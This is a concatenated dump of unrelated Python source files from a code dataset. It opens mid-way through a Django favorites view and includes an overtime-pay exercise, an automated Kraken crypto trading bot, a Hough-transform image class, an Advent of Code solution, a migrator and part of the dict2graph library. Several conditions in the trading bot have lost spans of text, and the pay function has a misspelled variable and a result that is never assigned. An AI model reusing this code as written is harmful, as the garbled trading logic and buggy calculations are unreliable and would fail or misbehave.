course.fav_nums -= 1\n if course.fav_nums < 0:\n course.fav_nums = 0\n course.save()\n elif int(fav_type) == 2:\n course_org = CourseOrg.objects.get(id=int(fav_id))\n course_org.fav_nums -= 1\n if course_org.fav_nums < 0:\n course_org.fav_nums = 0\n course_org.save()\n elif int(fav_type) == 3:\n teacher = Teacher.objects.get(id=int(fav_id))\n teacher.fav_nums -= 1\n if teacher.fav_nums < 0:\n teacher.fav_nums = 0\n teacher.save()\n return HttpResponse('{\"status\":\"success\", \"msg\":\"收藏\"}', content_type='application/json')\n else:\n user_fav = UserFavorite()\n if int(fav_id) > 0 and int(fav_type) > 0:\n user_fav.user = request.user\n user_fav.fav_id = int(fav_id)\n user_fav.fav_type = int(fav_type)\n user_fav.save()\n\n if int(fav_type) == 1:\n course = Course.objects.get(id=int(fav_id))\n course.fav_nums += 1\n course.save()\n elif int(fav_type) == 2:\n course_org = CourseOrg.objects.get(id=int(fav_id))\n course_org.fav_nums += 1\n course_org.save()\n elif int(fav_type) == 3:\n teacher = Teacher.objects.get(id=int(fav_id))\n teacher.fav_nums += 1\n teacher.save()\n\n return HttpResponse('{\"status\":\"success\", \"msg\":\"已收藏\"}', content_type='application/json')\n else:\n return HttpResponse('{\"status\":\"fail\", \"msg\":\"收藏出错\"}', content_type='application/json')\n\n\n\n\n","repo_name":"bulangdaoshi/lunix-","sub_path":"MXZX/app/Organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21255708194","text":"def computepay(hoursworked, payrate):\r\n #Variables\r\n totalpay = 0\r\n regularhours = 0\r\n overtimehours = 0\r\n regulartimelimit = 40\r\n regularpay = 0\r\n overtimepay = 0\r\n time_half = 1.5\r\n \r\n \r\n #If statement\r\n if hoursworked > regulartimelimit:\r\n regularhours = regulartimelimit\r\n overtimehours = hoursworked - Regulartimelimit\r\n \r\n else:\r\n regularhours = hoursworked\r\n overtimehours = 0\r\n \r\n regular = regularhours * payrate\r\n overtimepay = overtimehours * payrate * time_half\r\n \r\n totalpay = regularpay + overtimepay\r\n return totalpay\r\n#Calling the function\r\nprint (computepay(52, 20))\r\n ","repo_name":"Definitive-edition/Programming-for-IT-Problem-set-3","sub_path":"Exercise 6.py","file_name":"Exercise 6.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12282658960","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 31 22:54:47 2017\n\n@author: dboudeau\n\"\"\"\nimport exchange_krakken as kraken\nimport time,os\nimport persistenceHandler\nimport logging\nimport businessLogic\nimport notifier\nimport math\n\n\n# TODO Creer des classes traders/closed order car la c'est de la pure MERDE\n# TODO Unifier les differentes methodes qui appellent open and close orders. Il y en a plein ca sert à rien\n# TODO SI N ORDRE DE VENTE MANQUE IL FAUT GERER CA ! cf requete unclosed trade\n# TODO Chaque appel de open ou closed order devrait amener a un update de la table close\n\n# Var initialization\nAUTHORIZATION_OF_BUYING=bool(os.environ['AUTHORIZATION_OF_BUYING']=='True')\n# XRP -> XXRPZEUR LTC -> XLTCZEUR ETC -> XETCZEUR\nCURRENCY_CRAWLED_NAME=os.environ['CURRENCY_CRAWLED_NAME']\n# XRP -> XRPEUR LTC -> LTCEUR ETC -> ETCEUR\nCURRENCY_ORDER_NAME=os.environ['CURRENCY_ORDER_NAME']\n# XRP -> XXRP LTC -> XLTC ETC -> XETC\nCURRENCY_BALANCE_NAME=os.environ['CURRENCY_BALANCE_NAME']\n\nNOTIFY_ON_CLOSED_ORDERS=bool(os.environ['NOTIFY_ON_CLOSED_ORDERS']=='True')\n\n# Logging Management\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n\n\nkraken.init()\nlist_open_orders=kraken.get_single_open_orders(CURRENCY_ORDER_NAME)\nDONE=0\nNOT_DONE=1\n\n####################11\n# Initialize traders\nWAITING='wait'\nSELLING='sell'\nBUYING='buy'\nCLOSED='closed'\nCANCELED='canceled'\n\nsequence_number=-1\ndef increment_sequence():\n global sequence_number\n sequence_number=sequence_number+1\n return sequence_number\n\n##############################################################\n# TRADING SETUP \n##############################################################\nALLOWED_BUDGET=float(os.environ['ALLOWED_BUDGET'])\nEXPECTED_BENEFIT_BY_TRADER=float(os.environ['EXPECTED_BENEFIT_BY_TRADER'])\nNB_OF_TRADERS=int(os.environ['NB_OF_TRADERS'])\nSTEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE=float(os.environ['STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE'])\nMIN_BUYING_PRICE=float(os.environ['MIN_BUYING_PRICE'])\nMAX_BUYING_PRICE=float(os.environ['MAX_BUYING_PRICE'])\n\nBUDGET_BY_TRADER_LIST=os.environ['BUDGET_BY_TRADER_LIST']\ntemp=BUDGET_BY_TRADER_LIST.split(',')\nBUDGET_BY_TRADER_LIST = []\nfor item in temp:\n BUDGET_BY_TRADER_LIST.append(float(item))\n\nlist_trader=[]\nbuying_price=MAX_BUYING_PRICE\nfor index in range(0,NB_OF_TRADERS):\n # trader (integerId,budget(€),buy_unit_price,buying_order,Status,available_budget,engaged_budget\n list_trader.append([increment_sequence(),BUDGET_BY_TRADER_LIST[index],buying_price,None,WAITING,0.0,0.0])\n buying_price=round(buying_price-STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,1)\nif(list_trader[NB_OF_TRADERS-1][2]!=MIN_BUYING_PRICE):\n logger.error(\"Something wrong in configuration, minimum buying price (\"+str(MIN_BUYING_PRICE)+\") different from settings (\"+str(list_trader[NB_OF_TRADERS-1][2])+\")\")\n exit(1)\n\n##################################################################\n# COMMON FUNCTIONS\n##################################################################\n \n\ndef safetyCheckOnTradingCurrencySellingOrder(open_orders,owned_volume_of_traded_money):\n logger.info('On initizalization or after cancel order, check if there is no missing selling order')\n sold_volume=0.0\n for order in open_orders:\n if(order.get('type')==SELLING):\n sold_volume=sold_volume+order.get('vol')\n if(abs(owned_volume_of_traded_money - (sold_volume+0.1))>=0.5):\n \n # Particular case : If there is a buying/selling order partially processed, amount can be slightly different:\n logger.info(\"88 Checking for partial orders \")\n sum_buying_partial_selling=0.0\n sum_buying_partial_buying=0.0\n for item in open_orders:\n if (item.get('vol_exec')>0.0):\n if(item.get('type')==SELLING):\n logger.info(\"89-1 Adding \"+str(item.get('vol_exec'))+\" from SELLING order \"+item.get('order_id'))\n sum_buying_partial_selling=sum_buying_partial_selling+item.get('vol_exec')\n else:\n logger.info(\"89-2 Adding \"+str(item.get('vol_exec'))+\" from BUYING order \"+item.get('order_id'))\n sum_buying_partial_buying=sum_buying_partial_buying+item.get('vol_exec')\n \n logger.info(\" Sum partial BUYING order \"+str(sum_buying_partial_buying))\n logger.info(\" Sum partial SELLING order \"+str(sum_buying_partial_selling))\n logger.info(\" Sum of owned_volume_of_traded_money=\"+str(owned_volume_of_traded_money))\n logger.info(\" Sum of sold coins=\"+str(sold_volume))\n logger.info(\" Real sold =\"+str(sold_volume - sum_buying_partial_selling + sum_buying_partial_buying))\n \n \n if(abs(owned_volume_of_traded_money - (round( (sold_volume - sum_buying_partial_selling + sum_buying_partial_buying) ,1) ) )>=0.1):\n logger.info(CURRENCY_BALANCE_NAME+\" Sanity check error (Even with partial orders\")\n notifier.notify('Safety Check failed',CURRENCY_BALANCE_NAME+\" Sanity check error (Even with partial orders)\")\n exit(1)\n else:\n logger.info(CURRENCY_BALANCE_NAME+\" owned volume on exchange (\"+str(owned_volume_of_traded_money)+\") are all in sell mode (\"+str(round( (sold_volume - sum_buying_partial_selling + sum_buying_partial_buying) ,1))+\").Good to go.\")\n\n else:\n logger.info(CURRENCY_BALANCE_NAME+\" owned volume on exchange (\"+str(owned_volume_of_traded_money)+\") are all in sell mode (\"+str(sold_volume)+\").Good to go.\")\n \n # Checking number of open buying orders :\n counter_open_buying_order=0\n for open_order in open_orders:\n if(open_order.get('type')==BUYING):\n counter_open_buying_order=counter_open_buying_order+1\n \n # Test number of buying orders\n if(counter_open_buying_order>1):\n logger.error(\"More than 1 buying order detected\")\n notifier.notify(\"Fatal Error\",\"More than 1 buying order detected\"+str(open_order))\n logger.error(\"Exiting\")\n exit(1) \n \n\ndef calculatedEngagedMoney(volume,unit_sell_price,step_between_unit_sell_and_unit_price):\n buy_trade=volume * round(unit_sell_price-step_between_unit_sell_and_unit_price,2)\n fees=businessLogic.calculate_fee(volume * round(unit_sell_price-step_between_unit_sell_and_unit_price,2))\n engaged_money=math.ceil(buy_trade + fees)\n logger.info(\"Volume buyed was \"+str(volume) +\" at \"+str(round(unit_sell_price-step_between_unit_sell_and_unit_price,2) ))\n logger.info(\" fees were \"+str(fees) )\n logger.info(\" so (ceiled) engaged money was \"+str(float(round(buy_trade + fees,2))) )\n return float(engaged_money)\n\n# Ratio should be different\ndef budgetCalculation(list_trader,number_of_traders,logs=False):\n logger.info(\"------Begin calculating the budget for each trader before buying----\")\n available_budget=0\n for index in range(0,number_of_traders):\n # Define the ratio of the above(s) free traders which is allowed by below traders\n RATIO_OF_ABOVE_BUDGET_ALLOCATED=round((index+1)/number_of_traders,2)\n \n if(list_trader[index][4]==WAITING):\n list_trader[index][5]=round( (available_budget * RATIO_OF_ABOVE_BUDGET_ALLOCATED ) + list_trader[index][1] ,1)\n available_budget=available_budget+list_trader[index][1]\n else:\n list_trader[index][5]=0.0\n\n # Engaged money\n if(list_trader[index][6]>0 and list_trader[index][6]list_trader[index][2] and open_selling_order.get('price')<=round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2)):\n logger.info('Mapping order '+open_selling_order.get('order_id')+' - '+str(open_selling_order.get('price'))+' to trader '+str(list_trader[index][0]))\n logger.info('Trader '+str(index)+' ( '+str(list_trader[index][2])+' -> '+str(round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2))+')') \n is_order_mapped=True\n # Set up the trader with new status\n list_trader[index][3]=open_selling_order.get('order_id')\n list_trader[index][4]=SELLING\n list_trader[index][5]=0.0\n # Engaged money is selling volume*unit buy_price + fees\n list_trader[index][6]=calculatedEngagedMoney(open_selling_order.get('vol'),list_trader[index][2],STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n if(is_order_mapped):\n break;\n if is_order_mapped==False:\n logger.info('Order '+open_selling_order.get('order_id')+' is NOT MAPPED')\n\n# Calculate budget for further tests\nlist_trader=budgetCalculation(list_trader,NB_OF_TRADERS,logs=True)\n\n\n# Check that budget available on exchange is compliant \ntest_required_budget=list_trader[NB_OF_TRADERS-1][5]\ntest_available_budget=kraken.get_balance_EUR()\n\nif(test_available_budget0):\n is_buying_order_canceled_and_partially_executed=True\n \n opening_date=str(coe.get('opentm'))\n closing_date=str(coe.get('closetm'))\n\n # Don't send notification and dont store cancel order\n if(status!=CANCELED or is_buying_order_canceled_and_partially_executed==True):\n # Notify\n if(NOTIFY_ON_CLOSED_ORDERS==True):\n specific_text=\"\"\n if(is_buying_order_canceled_and_partially_executed==True):\n specific_text=\"PARTIALLY EXECUTED CANCEL \"\n notifier.notify(specific_text+'Order '+oe.get('order_id')+' '+str.upper(status),descr)\n\n logger.info('Order '+oe.get('order_id')+' '+str.upper(status)+\" \"+descr)\n \n # If an BUY order was CLOSED( or CANCELED but partially processed), search the concerned speculator to create sell order\n if(oe.get('type')==BUYING or oe.get('type')==SELLING):\n logger.info(\"order \"+str(oe.get('order_id'))+\" just closed, searching trader\")\n for index in range(0,NB_OF_TRADERS):\n if(list_trader[index][4]==BUYING and list_trader[index][3]==oe.get('order_id') and (status==CLOSED or is_buying_order_canceled_and_partially_executed==True) ):\n logger.info(\"1/ \"+str(BUYING)+\" order \"+oe.get('order_id')+\" was originally created by trader \"+str(index)+\".\")\n if(is_buying_order_canceled_and_partially_executed==True):\n logger.info(\"- Specific case of selling order creation after cancelation of partially executed buying order\")\n ########################\n # CREATING SELLING ORDER\n ########################\n # Get available amount of currency\n volume_buyed_to_sell=kraken.get_closed_order_volume_by_id(oe.get('order_id'),persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n logger.info(\"Volume to sell is :\"+str(volume_buyed_to_sell))\n if(volume_buyed_to_sell>0.0):\n unit_selling_price=round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2)\n logger.info(\"Unit sell price is:\"+str(unit_selling_price))\n # Selling order: secure_sell(volume,price,currency_crawling_name,persistenceHandler,current_step_between_buy_and_sell,CURRENCY_ORDER_NAME)\n created_selling_order=kraken.secure_sell(volume_buyed_to_sell,unit_selling_price,CURRENCY_CRAWLED_NAME,persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,CURRENCY_ORDER_NAME)\n fresh_open_orders.append(created_selling_order)\n list_trader[index][3]=created_selling_order.get('order_id')\n list_trader[index][4]=SELLING\n list_trader[index][5]=0.0\n # Setting engaged money\n list_trader[index][6]=calculatedEngagedMoney(volume_buyed_to_sell,unit_selling_price,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n logger.info(\"Trader \"+str(list_trader[index][0])+\" is now in mode\"+str(list_trader[index][4])+\" with order \"+str(list_trader[index][3])+\". Budget is :\"+str(list_trader[index][5]))\n break;\n if(list_trader[index][3]==oe.get('order_id') and ((list_trader[index][4]==SELLING) or ((list_trader[index][4]==BUYING) and (status==CANCELED)))):\n logger.info(\"2/ \"+str(list_trader[index][4])+\" order \"+oe.get('order_id')+\" was originally created by trader \"+str(index)+\".\")\n ####################################################\n # MANAGE SELL ENJOYMENT, OR BUY CANCELATION\n ####################################################\n flag_benefit=False\n if(list_trader[index][4]==SELLING):\n flag_benefit=True\n \n list_trader[index][3]=None\n list_trader[index][4]=WAITING\n # Budget will be calculated in the iteration\n list_trader[index][5]=0.0\n list_trader[index][6]=0.0\n logger.info(\"Trader \"+str(list_trader[index][0])+\" is now in mode\"+str(WAITING))\n \n # Special notification if to give you benefits\n if(flag_benefit):\n try:\n benefits=businessLogic.estimate_benefits(list_trader[index][2],volume,round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2))\n todays_benefits=businessLogic.calculate_today_benefits(persistenceHandler.get_todays_benefits())\n logger.info(\"Todays Benefits are \"+str(todays_benefits))\n notifier.notify(\";) Congrats\",\"If configuration did t change, Benefits are little bit under \"+str(benefits)+\"€\\nTotal for today :\"+str(todays_benefits[1])+\"€ (in \"+str(todays_benefits[0])+\" trades)\")\n logger.info(\"CONGRATULATIONS !!! Benefits are little bit under \"+str(benefits)+\"€\")\n logger.info(\"---------------------Total for today-> \"+str(todays_benefits[1])+\"€ (\"+str(todays_benefits[0])+\" trades)\")\n except Exception as e:\n logger.info(\"fail to send Special notification for benefit. error was \"+str(e))\n break;\n\n # Finally setup open order to freshest list\n list_open_orders=fresh_open_orders\n time.sleep(15)\n\n \n if(DO_STEP2==True):\n \n # Safety check (only if owned_value > 0 (if =-1 it means that it change during time when we get open orders))\n if(owned_volume>0.0):\n safetyCheckOnTradingCurrencySellingOrder(list_open_orders,owned_volume)\n else:\n logger.info(\"Safety check is not going to be performed ( owned_volume=\"+str(owned_volume)+\")\")\n \n ##########################\n # Traders\n ##########################\n CAN_LAUNCH_BUYING_ORDER=False\n CURRENT_BUYING_ORDER_ID=-1\n # Check if a trader is buying, else set up to buy\n EXISTS_OPEN_BUYING_ORDERS=False\n BUYING_TRADER_ID=-1\n for index in range(0,NB_OF_TRADERS):\n if list_trader[index][4]==BUYING:\n EXISTS_OPEN_BUYING_ORDERS=True\n BUYING_TRADER_ID=list_trader[index][0]\n CURRENT_BUYING_ORDER_ID=list_trader[index][3]\n \n # Get trading informations only if no other speculators are buying\n IS_TREND_GROWING=False\n if(EXISTS_OPEN_BUYING_ORDERS==False):\n df2=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,2)\n df5=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,5)\n df10=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,10)\n # I take 16 mins to be sure having at least 14.5 mins\n df15=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,16)\n \n trends2_is_growing=businessLogic.it_market_increasing(df2)\n trends5_is_growing=businessLogic.it_market_increasing(df5)\n trends10_is_growing=businessLogic.it_market_increasing(df10)\n trends15_is_growing=businessLogic.it_market_increasing(df15)\n \n delay_covered=(max(df15.index) - min(df15.index)).seconds\n logger.info('Covered delay = '+str(round( (delay_covered/60) ,2))+' mins / Trend data: (T2:'+str(len(df2))+' elems),(T5:'+str(len(df5))+' elems),(T10:'+str(len(df10))+' elems),(T15='+str(len(df15))+' elems)')\n \n # Checking if trend is reliable\n if(len(df2)>2 and len(df5)>5 and len(df10)>10 and len(df15)>15 and (delay_covered/60.0)>=14.5):\n if(trends2_is_growing and trends5_is_growing and trends10_is_growing and trends15_is_growing):\n # Checking that trends number is enough:\n logger.info(\"Market is good right now \")\n IS_TREND_GROWING=True\n else:\n logger.info(\"Market is not good at this time \")\n else:\n logger.warn(\"Number of data for trends is not reliable\")\n \n # If market is growing and no one is buying, check bugdet\n if(IS_TREND_GROWING==True and EXISTS_OPEN_BUYING_ORDERS==False):\n logger.info(\"Market is OK, and no buying orders open : time to shop a little bit ! \")\n # calculate budget, get the right trader and launch buying\n list_trader=budgetCalculation(list_trader,NB_OF_TRADERS,logs=True)\n \n #Check if the speculator has right to buy:\n if AUTHORIZATION_OF_BUYING==True and currency_actual_ask_price>=MIN_BUYING_PRICE:\n logger.info(\"Remember : Speculator is allowed to trade\")\n # /!\\ check from lowest trader to higher trader is essential\n SELECTED_TRADER_ID_FOR_BUYING=-1\n for index in range(NB_OF_TRADERS-1,-1,-1):\n # If trader's buy price is higher than value price we have the right trader\n if(list_trader[index][2]>=currency_actual_ask_price):\n # index of selected trader is index+1 (lower )\n ###################\n # SET BUYING ORDER\n ##################\n SELECTED_TRADER_ID_FOR_BUYING=index+1\n # Checking it trader is available:\n if(list_trader[SELECTED_TRADER_ID_FOR_BUYING][4]==WAITING):\n # Calculate volume to buy\n volume_to_buy=businessLogic.get_maximum_volume_to_buy_with_budget( round( list_trader[SELECTED_TRADER_ID_FOR_BUYING][5],2),list_trader[SELECTED_TRADER_ID_FOR_BUYING][2] )\n logger.info(\"Trader \"+str(SELECTED_TRADER_ID_FOR_BUYING)+' was selected to buy at '+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][2])+\" because market price is \"+str(currency_actual_ask_price))\n logger.info(\" budget is going to be \"+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][5])+\"€\")\n logger.info(\" buying volume :\"+str(volume_to_buy))\n logger.info(\" For further analysis, unix time is \"+str(kraken_time))\n \n # create buying order\n created_buying_order=kraken.secure_buy(volume_to_buy,list_trader[SELECTED_TRADER_ID_FOR_BUYING][2],CURRENCY_CRAWLED_NAME,persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,CURRENCY_ORDER_NAME)\n logger.info(\"Buying order \"+created_buying_order.get('order_id')+\" was created\")\n list_open_orders.append(created_buying_order)\n # /!\\set up right status and cut budget setup selling order \n list_trader[SELECTED_TRADER_ID_FOR_BUYING][3]=created_buying_order.get('order_id')\n list_trader[SELECTED_TRADER_ID_FOR_BUYING][4]=BUYING\n list_trader[SELECTED_TRADER_ID_FOR_BUYING][5]=0.0\n # setup buying mode to avoir other buy attempt\n EXISTS_OPEN_BUYING_ORDERS=True\n else:\n logger.info(\"Speculator wanted with trader \"+str(SELECTED_TRADER_ID_FOR_BUYING)+\" is already in \"+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][4])+\" mode\")\n break;\n else:\n logger.info(\"Speculator is actually in mode AUTHORIZATION_OF_BUYING==False\")\n else:\n if(EXISTS_OPEN_BUYING_ORDERS==True):\n # On ne verifie pas l'ordre du top trader (on ne peut rien faire de toute manière)\n if(BUYING_TRADER_ID>0):\n logger.info(\"Check if Trader \"+str(BUYING_TRADER_ID)+\" buying order has still potential to reach \")\n # check if order is ok\n buying_trader=list_trader[BUYING_TRADER_ID]\n upper_buying_trader=list_trader[BUYING_TRADER_ID-1]\n if(buying_trader[0]==BUYING_TRADER_ID and upper_buying_trader[0]==BUYING_TRADER_ID-1):\n # Control is : market price has to be - upper or equals to buyer unit price\n if(buying_trader[2]<= currency_actual_ask_price and currency_actual_ask_price max_variance:\n max_variance = variance\n target_shift = shift\n\n if shift % 300 == 0 and shift != -MAX_SHIFT:\n plt.clf()\n plt.plot(np.arange(-MAX_SHIFT, shift + 1), variances)\n plt.savefig('out/variances.png')\n\n print(f\"Finished calculating, optimal shift is {target_shift}\")\n sys.setrecursionlimit(old_recursion_limit)\n\n return img_tools.rotate_by_shift(\n self.source, target_shift, \n img_tools.InterpolationType.BILINEAR\n )\n\n def _get_brightness_variance(self, shift):\n line_brightness = []\n N, M = self._img.shape \n for x in range(min(-shift, 0), max(N - shift, N) + 1):\n stats = self._brightness_statistics(x, 0, shift, M)\n if stats[1] != 0:\n line_brightness.append(stats[0] / stats[1])\n return np.var(line_brightness) if line_brightness else 0\n\n @lru_cache(10**8)\n def _brightness_statistics(self, x, y, shift_x, shift_y):\n \"\"\"\n returns (brightness sum, amount of featured cells)\n of cells from to not inclusive\n \"\"\"\n\n sign = lambda x: 1 if x >= 0 else -1\n if not img_tools.contains_coordinates(self._img, x, y) and \\\n not img_tools.contains_coordinates(self._img, x + shift_x - sign(shift_x), y + shift_y - 1):\n return np.array([0, 0]) \n \n if abs(shift_x) <= 1:\n res = np.zeros(2)\n for y_i in range(y, y + shift_y):\n if img_tools.contains_coordinates(self._img, x, y_i):\n res += np.array([self._img[x][y_i], 1])\n return res\n\n shift_x2 = sign(shift_x) * (abs(shift_x) // 2)\n shift_y2 = shift_y // 2\n return self._brightness_statistics(x, y, shift_x2, shift_y2) +\\\n self._brightness_statistics(x + shift_x2, y + shift_y2, shift_x - shift_x2, shift_y - shift_y2)","repo_name":"Moysenko/ABBYY_CV","sub_path":"Homework_3/fht.py","file_name":"fht.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74927007452","text":"def score_round(text: str) -> int:\n legend = {\n \"A\": \"Rock\",\n \"B\": \"Paper\",\n \"C\": \"Scissors\",\n \"X\": \"Rock\",\n \"Y\": \"Paper\",\n \"Z\": \"Scissors\",\n }\n wins = {\"Rock\": \"Scissors\", \"Paper\": \"Rock\", \"Scissors\": \"Paper\"}\n choices = {\"Rock\": 1, \"Paper\": 2, \"Scissors\": 3}\n opp, me = text.split(\" \")\n conv_opp, conv_me = legend[opp], legend[me]\n score = choices[conv_me]\n if wins[conv_opp] == conv_me:\n pass\n elif conv_opp == conv_me:\n score += 3\n elif wins[conv_me] == conv_opp:\n score += 6\n return score\n\n\ndef score_game(text: str) -> int:\n score = 0\n for cur_round in text.split(\"\\n\"):\n score += score_round(cur_round)\n return score\n\n\ndef part_1():\n # tests\n with open(\"2_test.txt\", \"r\") as f:\n data = f.read()\n assert score_game(data) == 15\n\n # input\n with open(\"2_input.txt\", \"r\") as f:\n data = f.read()\n print(score_game(data))\n\n\ndef score_round_part2(text: str) -> int:\n legend = {\"A\": \"Rock\", \"B\": \"Paper\", \"C\": \"Scissors\"}\n wins = {\"Rock\": \"Scissors\", \"Paper\": \"Rock\", \"Scissors\": \"Paper\"}\n losses = {v: k for k, v in wins.items()}\n choices = {\"Rock\": 1, \"Paper\": 2, \"Scissors\": 3}\n opp, me = text.split(\" \")\n conv_opp = legend[opp]\n score = 0\n if me == \"X\":\n score += choices[wins[conv_opp]]\n elif me == \"Y\":\n score += choices[conv_opp] + 3\n elif me == \"Z\":\n score += choices[losses[conv_opp]] + 6\n return score\n\n\ndef score_second_game(text: str) -> int:\n score = 0\n for cur_round in text.split(\"\\n\"):\n score += score_round_part2(cur_round)\n return score\n\n\ndef part_2():\n # tests\n with open(\"2_test.txt\", \"r\") as f:\n data = f.read()\n assert score_second_game(data) == 12\n\n # input\n with open(\"2_input.txt\", \"r\") as f:\n data = f.read()\n print(score_second_game(data))\n\n\npart_1()\npart_2()\n","repo_name":"grahampicard/advent-of-code-2022","sub_path":"2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41812236353","text":"import importlib\n\n\nclass Migrator:\n\tVERSION = None\n\n\tdef __init__(self, db):\n\t\t\"\"\"\n\t\tInitiate migrator class.\n\n\t\t:param db: Database instance\n\t\t:type db: layblr.database.db.Database\n\t\t\"\"\"\n\t\tself.db = db\n\t\tself.connection = db.connection\n\n\tasync def up(self):\n\t\t\"\"\"\n\t\tMigrate the schema to the new version.\n\t\t\"\"\"\n\t\traise NotImplementedError\n\n\tasync def down(self):\n\t\t\"\"\"\n\t\tMigrate down to the older version (undo changes). Optional but recommended.\n\t\t:return:\n\t\t\"\"\"\n\t\traise Exception('No down migration')\n\n\ndef get_migration_versions():\n\t\"\"\"\n\tScan folder for migration versions and return the version classes.\n\n\t:return: Version migrator classses.\n\t\"\"\"\n\tfrom layblr.database.migration import versions\n\treturn versions\n\n\ndef get_latest_version():\n\t\"\"\"\n\tGet latest version.\n\n\t:return: Latest version number\n\t\"\"\"\n\tversions = get_migration_versions()\n\treturn int(versions[len(versions) - 1])\n\n\ndef get_version_class(version):\n\t\"\"\"\n\tImport and return class of the given integer version.\n\t:param version: Version integer.\n\t:return: Class of the migration version.\n\t\"\"\"\n\tversion_string = '{0:03d}'.format(version)\n\tmodule_name = 'v{}'.format(version_string)\n\tversion_class = 'Version{}'.format(version_string)\n\n\tmodule = importlib.import_module('layblr.database.migration.{}'.format(module_name))\n\treturn getattr(module, version_class)\n","repo_name":"layblr/layblr","sub_path":"layblr/database/migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41597447839","text":"import json\nfrom typing import Union\nfrom typing import List, Dict, Tuple, Type\nfrom py2neo import Graph\nfrom neo4j import Driver\n\nfrom graphio import NodeSet, RelationshipSet\nfrom dict2graph.node import Node\nfrom dict2graph.relation import Relation\nfrom dict2graph.transformers._base import (\n _NodeTransformerBase,\n _RelationTransformerBase,\n)\nfrom dict2graph.transformers import Transformer\nfrom dict2graph.matcher_transformators_container import (\n MatcherTransformersContainer,\n MatcherTransformersContainerStack,\n)\n\n\nclass Dict2graph:\n \"\"\"\n The central class for dict2graph. Must be instanced to do get started and access the dict2graph api.\n\n **Class attributes**\n Dict2Graph has some basic options, packed into class attributes. You can change them after instantiating Dict2Graph.\n Usally you can go with the default values and dont need to change anything here.\n\n **example**\n\n ```python\n from dict2graph import Dict2graph\n\n d2g = Dict2graph()\n d2g.list_hub_additional_labels = [\"Collection\"]\n ```\n This will (later when parsing/transforming) add a label `Collection` to all list hubs\n\n\n Attributes:\n list_hub_additional_labels: Add these labels to list hub nodes. Defaults to `[\"ListHub\"]`.\n\n list_item_additional_labels: Add these labels to list item nodes. Defaults to `[\"ListItem\"]`.\n\n list_hub_id_property_name: A hub node has hash generated property based on its items.\n This is the name/key of the property. Defaults to `id`.\n\n list_item_relation_index_property_name: To preserve a json/dict list sequence,\n the index will be added to the relation from a list item node.\n This is the name/key of this property. Defaults to `_list_item_index`.\n\n simple_list_item_data_property_name: A list of basic types like `[1,2,3]` will get the label from its parents,\n but needs a default name/key for the value properties. Defaults to `_list_item_data`.\n\n root_node_default_labels: Will be used as root node label, if no root node label can be captured\n and no articial root node labels (via `Dict2Graph.parse(root_node_labels)`) are provided. Defaults to `[\"Dict2GraphRoot\"]`.\n\n root_node_default_id_property_name: The root node will have a primary key based on a hash of the dict input. This is the name/key fir this property.\n\n empty_node_default_id_property_name: To prevent all empty nodes to merging together when doing\n `Dict2Graph.merge()`, they get an hash id by default.\n This is name/key for this property. Defaults to `id`.\n \"\"\"\n\n # Replacement strings {ITEM_PRIMARY_LABEL} and {ITEM_LABELs} are available\n list_hub_additional_labels: List[str] = [\"ListHub\"]\n list_item_additional_labels: List[str] = [\"ListItem\"]\n list_hub_id_property_name: str = \"id\"\n list_item_relation_index_property_name: str = \"_list_item_index\"\n\n simple_list_item_data_property_name: str = \"_list_item_data\"\n root_node_default_labels: List[str] = [\"Dict2GraphRoot\"]\n root_node_default_id_property_name: str = \"id\"\n\n empty_node_default_id_property_name: str = \"id\"\n\n def __init__(\n self,\n create_ids_for_empty_nodes: bool = True,\n interpret_single_props_as_labels: bool = True,\n ):\n \"\"\"\n Usage:\n ```python\n from dict2graph import Dict2graph\n\n d2g = Dict2Graph()\n ```\n\n Args:\n create_ids_for_empty_nodes (bool, optional): When input dicts results in empty 'hub' nodes, this will create artificially key properties based on the child data. The key will be deterministic . Defaults to True.\n interpret_single_props_as_labels (bool, optional): When having objects with a single property like `{\"animal\":{\"name\":\"dog\"}}` `animal` will be interpreted as label. If set to false \"animal\" will result in an extra Node. Defaults to True.\n \"\"\"\n self.create_ids_for_empty_nodes = create_ids_for_empty_nodes\n\n # Todo: \"interpret_single_props_as_labels\" should be a regualr NodeTransformer instead of a class param\n self.interpret_single_props_as_labels = 